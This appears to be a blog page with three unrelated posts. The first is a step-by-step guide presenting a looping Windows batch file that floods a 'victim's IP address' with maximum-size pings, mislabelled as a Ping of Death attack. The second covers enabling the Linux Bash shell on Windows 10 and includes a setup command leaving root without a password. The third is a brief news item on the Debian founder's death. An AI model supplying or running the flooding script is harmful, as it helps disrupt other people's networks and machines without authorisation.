How To Perform Ping of Death Attack Using Simple Batch File

We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes.
Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack.

Not wasting much time;

Here are the steps to  perform an ping attack:

• Open Notepad
• Copy the following text on the notepad

:loop
ping 192.168.32.13 -l 65500 -w 1 -n 1
goto :loop

In the above command, replace 192.168.32.13 with victims IP address.

• Save the Notepad with any name. Let’s say dos.txt
• Right click on the dos.txt and click on rename.
• Change the extension from .txt to .bat
• So, now the file name should be dos.bat
• Double click on it and you will see a command prompt running with a lot of pings.

How to enable Linux Bash Shell on the new Windows 10

 

With the new Windows 10 Aniversary Update ,  a great new feature which is the Bash Shell has been added to the Windows.This Ubuntu-based Bash shell  can run Linux software directly on Windows.
This isn’t a virtual machine , a container, or Linux software compiled for Windows, instead, Windows 10 gains a Windows Subsystem for Linux, which is based on Microsoft’s abandoned Project Astoria work for running Android apps on Windows.

First of all you need to have the aniversary update of windows 10.
Once you’re sure you’re using the correct version of Windows 10, open the Settings app and head to Update & Security > For Developers. Activate the “Developer Mode” switch here to enable Developer Mode.

Next, open the Control Panel, click “Programs,” and click “Turn Windows Features On or Off” under Programs and Features. Enable the “Windows Subsystem for Linux (Beta)” option in the list here and click “OK.”
After you do, you’ll be prompted to reboot your computer. Click “Restart Now” to reboot your computer and Windows 10 will install the new feature.

After your computer restarts, click the Start button (or press the Windows key), type “bash”, and press “Enter.”

The first time you run the bash.exe file, you’ll be prompted to accept the terms of service. The command will then download the “Bash on Ubuntu on Windows” application from the Windows Store. You’ll be asked to create a user account and password for use in the Bash environment.

If you’d like to automate the installation of Bash instead, you can run the following command in a Command Prompt window. This will automatically agree to all prompts and set the default user to “root” with no password:

lxrun /install /y

Debian Founder Commits Suicide: Autopsy

Autopsy reports have confirmed that Ian Murdock , the founder of the base platform for some of the most popular linux operating systems , who died last year , was a case of suicide by hanging as confirmed by Dr. Amy Hart. He died last year at the age of 42 and his death was confirmed by the Docker Blog where he used to work as a technical assisstant. Murdock created the Debian platform in August 1993.

Some sources even say that his Twitter handle was hacked for a few moments and restored again in a few moments.. MAY HIS SOUL REST IN PEACE!!
